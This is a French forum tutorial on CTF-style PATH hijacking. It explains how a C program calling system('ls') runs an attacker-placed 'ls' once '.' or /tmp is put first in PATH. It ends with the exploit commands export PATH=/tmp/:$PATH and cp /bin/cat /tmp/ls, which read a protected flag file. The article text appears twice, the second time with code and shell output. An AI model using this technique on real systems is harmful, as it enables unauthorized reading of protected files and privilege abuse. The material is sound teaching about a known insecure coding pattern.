[Failles App] Faille de la fonction system()
Bonjour à tous , 
Pour me mettre dans le bain de la Sécurité Applicative, J'ai décidé de faire ce tutoriel sur "la failles system()".
Dans une premiere Partie nous allons voir pourquoi la fontcion system() de la libc, est faillible.
0x1 - Pourquoi la fonction system() est vulnerable :
Prenons comme exemple le code suivant :
La fonction system a pour argument "ls" , ce qui , executé listera le dossier courant de tout ces fichiers et dossiers.
1er resultat :
 
Ici, dans le dossier courant on trouve le fichier executable "code" et la source "code.c".
la fonction system va executer l'argument dans le terminal.
essaons donc de mettre un fichier "ls" dans le dossier courant qui affichera "bonjour !" .
Ensuite , nous allons modifier la Variable d'envoronnement PATH , qui est equivalente a celle de windows ..
Exemple sous windows si on met un executable "hola.exe" dans le dossier "system32" , si on tape directement "hola" dans le terminal windows , alors le programme "hola.exe" s'executera.
Sous Linux c'est pareil tout les dossiers inclus dans PATH sont séparé par des ":".
exemple :
Le miens est long , mais peut importe on va le modifier et inclure le dossier courant à la Variable PATH comme ceci :
/*
"." signifie "DOSSIER COURANT"
*/
ainsi , si on tape "ls" dans le dossier ou se trouve le programme ls , on executera directement le programme "ls" du dossier et non "/bin/ls" .
exemple :
0x2 - Exploitation dans un exemple :
Dans certains challenge on peut trouver le code suivant :
Dans ce challenge on aurai uniquement acces en ecriture au dossier "/tmp/" , nous allons donc ajouter à la variable PATH le dossiser tmp comme ceci :
Voici !
Vous devinerez que cette fois ci, il faudra creer un programme dans le dossier tmp.
ce que j'ai fais , moi , c'est tout simplement executer ce code la :
Merci d'avoir prété intention à mon "Tutoriel" et à bientot !!
Pour me mettre dans le bain de la Sécurité Applicative, J'ai décidé de faire ce tutoriel sur "la failles system()".
Dans une premiere Partie nous allons voir pourquoi la fontcion system() de la libc, est faillible.
0x1 - Pourquoi la fonction system() est vulnerable :
Prenons comme exemple le code suivant :
Code :
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
printf("----- Faille de la fonction Systeme ------\n Listing Directory Function \n");
system("ls");
printf("END\n");
exit(1);
}La fonction system a pour argument "ls" , ce qui , executé listera le dossier courant de tout ces fichiers et dossiers.
1er resultat :
Citation :[18:19 sakiir@sakiir system] > gcc code.c -o code
[18:19 sakiir@sakiir system] > ./code
----- Faille de la fonction Systeme ------
Listing Directory Function
code code.c
END
[18:20 sakiir@sakiir system] >
Ici, dans le dossier courant on trouve le fichier executable "code" et la source "code.c".
la fonction system va executer l'argument dans le terminal.
essaons donc de mettre un fichier "ls" dans le dossier courant qui affichera "bonjour !" .
Ensuite , nous allons modifier la Variable d'envoronnement PATH , qui est equivalente a celle de windows ..
Exemple sous windows si on met un executable "hola.exe" dans le dossier "system32" , si on tape directement "hola" dans le terminal windows , alors le programme "hola.exe" s'executera.
Sous Linux c'est pareil tout les dossiers inclus dans PATH sont séparé par des ":".
exemple :
Citation :[18:23 sakiir@sakiir system] > echo $PATH
/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:26 sakiir@sakiir system] >
Le miens est long , mais peut importe on va le modifier et inclure le dossier courant à la Variable PATH comme ceci :
Citation :[18:27 sakiir@sakiir system] > export PATH=.:$PATH
[18:27 sakiir@sakiir system] > echo $PATH
.:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:28 sakiir@sakiir system] >
/*
"." signifie "DOSSIER COURANT"
*/
ainsi , si on tape "ls" dans le dossier ou se trouve le programme ls , on executera directement le programme "ls" du dossier et non "/bin/ls" .
exemple :
Citation :[18:30 sakiir@sakiir system] > /bin/ls
code code.c hello.c ls
[18:30 sakiir@sakiir system] > ls
bonjour !
0x2 - Exploitation dans un exemple :
Dans certains challenge on peut trouver le code suivant :
Code :
#include <stdio.h>
int main()
{
system("ls /dossier/dossier/flag");
}Dans ce challenge on aurai uniquement acces en ecriture au dossier "/tmp/" , nous allons donc ajouter à la variable PATH le dossiser tmp comme ceci :
Citation :[18:36 sakiir@sakiir system] > export PATH=/tmp/:$PATH
[18:36 sakiir@sakiir system] > echo $PATH
/tmp/:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:36 sakiir@sakiir system] >
Voici !

Vous devinerez que cette fois ci, il faudra creer un programme dans le dossier tmp.
ce que j'ai fais , moi , c'est tout simplement executer ce code la :
Citation :cp /bin/cat /tmp/lsDonc ici le programme cat est dans tmp avec le nom "ls".
Merci d'avoir prété intention à mon "Tutoriel" et à bientot !!


 Accueil du forum
 Accueil du forum Liste des membres
 Liste des membres Qui est en ligne ?
 Qui est en ligne ? Recherche
 Recherche Calendrier
 Calendrier Zine
 Zine URL de redirection
 URL de redirection Classement (Top 100)
 Classement (Top 100) Proposez un challenge!
 Proposez un challenge! Hacking
 Hacking Hacking
 Hacking  Spirit of hack
 Spirit of hack Messages: 32 822
 Messages: 32 822 Client IRC en ligne
 Client IRC en ligne